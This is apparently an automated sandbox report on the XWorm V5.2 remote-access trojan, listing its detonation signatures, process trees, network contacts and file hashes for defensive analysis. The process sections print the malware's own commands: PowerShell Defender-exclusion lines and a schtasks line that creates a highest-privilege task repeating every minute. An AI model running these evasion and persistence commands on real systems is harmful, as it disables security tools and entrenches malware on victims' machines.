Malware Analysis Report

2024-10-16 05:01

Sample ID 240802-2mn3rayalf
Target XWorm V5.2.rar
SHA256 6bde76de6064f5cb941da866a26b81f18d4a7e3d738d416238fa73c0b01149a7
Tags
xworm execution persistence rat trojan discovery dropper agilenet agenttesla
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6bde76de6064f5cb941da866a26b81f18d4a7e3d738d416238fa73c0b01149a7

Threat Level: Known bad

The file XWorm V5.2.rar was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan discovery dropper agilenet agenttesla

Xworm family

Xworm

Contains code to disable Windows Defender

AgentTesla payload

Agenttesla family

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Checks computer location settings

Executes dropped EXE

Obfuscated with Agile.Net obfuscator

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-02 22:42

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm family

xworm

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:39

Platform

win10v2004-20240802-en

Max time kernel

422s

Max time network

425s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:27

Platform

win7-20240708-en

Max time kernel

357s

Max time network

362s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:35

Platform

win10v2004-20240802-en

Max time kernel

599s

Max time network

419s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\q11111 = "C:\\Users\\Public\\q11111" C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 540 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 540 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 1624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 812 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 812 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe
PID 1624 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe

"C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\q11111'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp

Files

memory/540-0-0x00007FFD52CB3000-0x00007FFD52CB5000-memory.dmp

memory/540-1-0x0000000000780000-0x0000000001D02000-memory.dmp

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 767d4d113ea2e9d9886b2aa1710db7f3
SHA1 f7f779a94fb6fe0e3ee8996dff7951b3b5c7b1b0
SHA256 b06506ca596951ae4c75e43d5aba7c255c557cf5607915a214c2a3f53e97934f
SHA512 ea1f6b926b2e19d0521dc3939c247094640ba6fb10b8c0a4dbb48306c5b7e8b9a3659d4f83ead234ba3c035ae09d891d8c2c302945f48b94a4a0916d3ca7ee41

memory/1624-14-0x0000000000010000-0x0000000000060000-memory.dmp

memory/1624-16-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp

memory/1624-54-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp

memory/4484-60-0x00000197143C0000-0x00000197143E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1soeebal.sdx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0cef0ab8fb4f5e4162ce67e844c3aa54
SHA1 4deb083986e41017371af415c8a0829da4a9f626
SHA256 b0aa3ab509f749d4ec08cd6ec38a707d1b3c18f1386e5bcf017119cda834adbe
SHA512 0f562119e6229d1bcaa3e34253685dc255cbb419515218876c1868e70f9f95d9f158a2658272e3f4bd9d7276aee79d5d2ae05ce8bfb453aa4b6af6ae84a90541

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 98baf5117c4fcec1692067d200c58ab3
SHA1 5b33a57b72141e7508b615e17fb621612cb8e390
SHA256 30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51
SHA512 344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

memory/1624-102-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp

memory/1624-103-0x00007FFD52CB0000-0x00007FFD53771000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\q11111.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Analysis: behavioral23

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:38

Platform

win7-20240708-en

Max time kernel

361s

Max time network

365s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:36

Platform

win7-20240729-en

Max time kernel

596s

Max time network

361s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2572 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 2572 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 2572 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 1800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 1800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 1800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 1800 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 2408 wrote to memory of 3032 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2408 wrote to memory of 3032 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2408 wrote to memory of 3032 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2408 wrote to memory of 3032 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2408 wrote to memory of 2812 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2408 wrote to memory of 2812 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2408 wrote to memory of 2812 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2408 wrote to memory of 2812 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2812 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2812 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2812 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 112 wrote to memory of 1616 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
